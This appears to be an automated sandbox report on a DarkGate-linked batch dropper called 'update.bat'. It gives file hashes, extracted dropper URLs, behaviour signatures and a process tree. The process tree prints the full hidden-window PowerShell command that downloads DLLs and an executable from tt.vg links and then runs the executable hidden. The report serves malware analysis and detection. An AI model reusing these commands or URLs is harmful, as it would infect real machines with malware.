Resubmissions

25-08-2024 09:52

240825-lwb7jsxgmh 10

22-08-2024 07:27

240822-h98wwsvdrh 10

22-08-2024 07:21

240822-h651tsxhrk 10

21-08-2024 20:21

240821-y44b8aydje 10

Analysis

  • max time kernel
    16s
  • max time network
    18s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    21-08-2024 20:21

General

  • Target

    exe/crypted/Dakrgate 5864 startup plus rootkit/Batch file for 5864v dll crypted darkgate/update.bat

  • Size

    6KB

  • MD5

    97b7c88a02b2a5214d742b7ed50f4544

  • SHA1

    15bf7dd44049b94db1a82504802ead45f6186fa0

  • SHA256

    20c3a5b1c87627e9e016494b806273230f5023cf12d2c0e29eceecb7b8a6d3b6

  • SHA512

    918c856e61d8b348a705227ec381a8101481ec3aaa4a1f6545b9706ebf491d311cfe716f62ab04c796333bae5df857fc67cac86760be1c67578ca1031a906b25

  • SSDEEP

    192:GqNFRmxkyzz06ETWtd4pTunJ8ccJkBhKhgQ:Vp2kgzSTWsu6hJEhKht

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://tt.vg/download-update-dll1

exe.dropper

https://tt.vg/dlldownload2sqliuit-download

exe.dropper

https://tt.vg/download-latest-update

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\exe\crypted\Dakrgate 5864 startup plus rootkit\Batch file for 5864v dll crypted darkgate\update.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2812
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -WindowStyle Hidden -Command "& {$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://tt.vg/download-update-dll1', 'C:\Users\Admin\AppData\Local\Temp\libssp-0.dll'); $wc.DownloadFile('https://tt.vg/dlldownload2sqliuit-download', 'C:\Users\Admin\AppData\Local\Temp\sqlite3.dll'); $wc.DownloadFile('https://tt.vg/download-latest-update', 'C:\Users\Admin\AppData\Local\Temp\pidgin.exe')}"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3644
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -WindowStyle Hidden -Command "& {Start-Process 'C:\Users\Admin\AppData\Local\Temp\pidgin.exe' -WindowStyle Hidden}"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      PID:1604

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dzwk30aw.iqj.ps1

    Filesize

    1B

    MD5

    c4ca4238a0b923820dcc509a6f75849b

    SHA1

    356a192b7913b04c54574d18c28d46e6395428ab

    SHA256

    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

    SHA512

    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

  • memory/3644-0-0x00007FFA7ECD3000-0x00007FFA7ECD4000-memory.dmp

    Filesize

    4KB

  • memory/3644-5-0x0000020F43FB0000-0x0000020F43FD2000-memory.dmp

    Filesize

    136KB

  • memory/3644-7-0x00007FFA7ECD0000-0x00007FFA7F6BC000-memory.dmp

    Filesize

    9.9MB

  • memory/3644-9-0x0000020F5C740000-0x0000020F5C7B6000-memory.dmp

    Filesize

    472KB

  • memory/3644-10-0x00007FFA7ECD0000-0x00007FFA7F6BC000-memory.dmp

    Filesize

    9.9MB

  • memory/3644-26-0x00007FFA7ECD0000-0x00007FFA7F6BC000-memory.dmp

    Filesize

    9.9MB

  • memory/3644-43-0x00007FFA7ECD3000-0x00007FFA7ECD4000-memory.dmp

    Filesize

    4KB

  • memory/3644-44-0x00007FFA7ECD0000-0x00007FFA7F6BC000-memory.dmp

    Filesize

    9.9MB

  • memory/3644-56-0x00007FFA7ECD0000-0x00007FFA7F6BC000-memory.dmp

    Filesize

    9.9MB